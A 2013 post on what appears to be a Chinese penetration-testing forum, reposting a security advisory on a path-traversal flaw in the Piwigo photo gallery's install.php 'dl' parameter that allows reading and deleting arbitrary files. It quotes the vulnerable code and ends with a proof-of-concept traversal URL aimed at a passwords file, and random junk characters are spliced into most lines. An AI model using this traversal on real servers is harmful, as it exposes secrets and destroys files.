找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Piwigo任意文件泄露和任意文件删除漏洞
返回列表 发新帖
查看: 3048|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。
- s. c' K6 @5 p$ x( y
& |5 r0 {* S, b/ X! G" q) g/ d; wPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。0 y7 e5 d/ v, M  O
====================================================================
1 ~9 W2 i) k9 v. J/install.php:
2 K8 i' N! J! e2 U# B1 S7 @-------------, v: s6 R1 v4 o* p
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
  j; {/ I3 b: r8 v+ Q* N0 ~/ _114: {& z6 ~$ W, G* G* f& V. V
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];+ Y# {1 d) T; S8 _8 P! m2 j
116:   header('Cache-Control: no-cache, must-revalidate');
3 @, x7 O% J$ ?4 k7 H117:   header('Pragma: no-cache');
# @7 _7 I8 f5 z0 `+ W118:   header('Content-Disposition: attachment; filename="database.inc.php"');
" n7 c' O5 J9 i- b! P+ z1 L; \119:   header('Content-Transfer-Encoding: binary');
# H# h7 O% f4 d# w3 n120:   header('Content-Length: '.filesize($filename));
; \2 j% P- G; k/ Q0 C121:   echo file_get_contents($filename);& A5 H$ S  x" J$ a+ c1 _$ ]
122:   unlink($filename);0 ]& |' L  ~4 j: P/ n
123:   exit();; O7 u4 M& ?  y7 [8 K2 V  @9 w
124: }7 M# w; G0 m1 C+ O+ b7 n
====================================================================
2 r2 `  b+ j) j 7 @9 U& s1 w8 O% u
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)" G  b9 o( C8 k$ P$ d9 `" B* d+ \( f/ y' v
           Apache 2.4.2 (Win32)
! J+ K2 C# u8 Z0 A/ L$ y; [           PHP 5.4.4! y" c% Y" k9 }* M9 D. D
           MySQL 5.5.25a
* ~* ]- ^& k) i + V* K$ r- Z" N. H; G
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic6 a! a, @8 {5 F7 R
                            @zeroscience. i4 n9 t6 ^6 G4 @+ M

) ~9 ~6 F% |5 u2 K* A! r# |/ o& YAdvisory ID: ZSL-2013-5127- e3 T9 R+ Y+ K
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php: ]+ E( T& s3 S6 Q2 T+ M4 N# w
Vendor Patch: http://piwigo.org/bugs/view.php?id=28430 G2 _& G. x( Y5 v- H# D/ n
% `6 D0 t, w& z% {- X0 ^9 s* y% F
15.02.2013
0 Q5 d! I% r8 F% l5 z ' d3 D( f: G; a$ c1 }* M1 }
--" ^# }) z/ p( K% J6 `  M
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt2 o' h; h% t! [
# K# q+ M3 g+ e! M" m
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表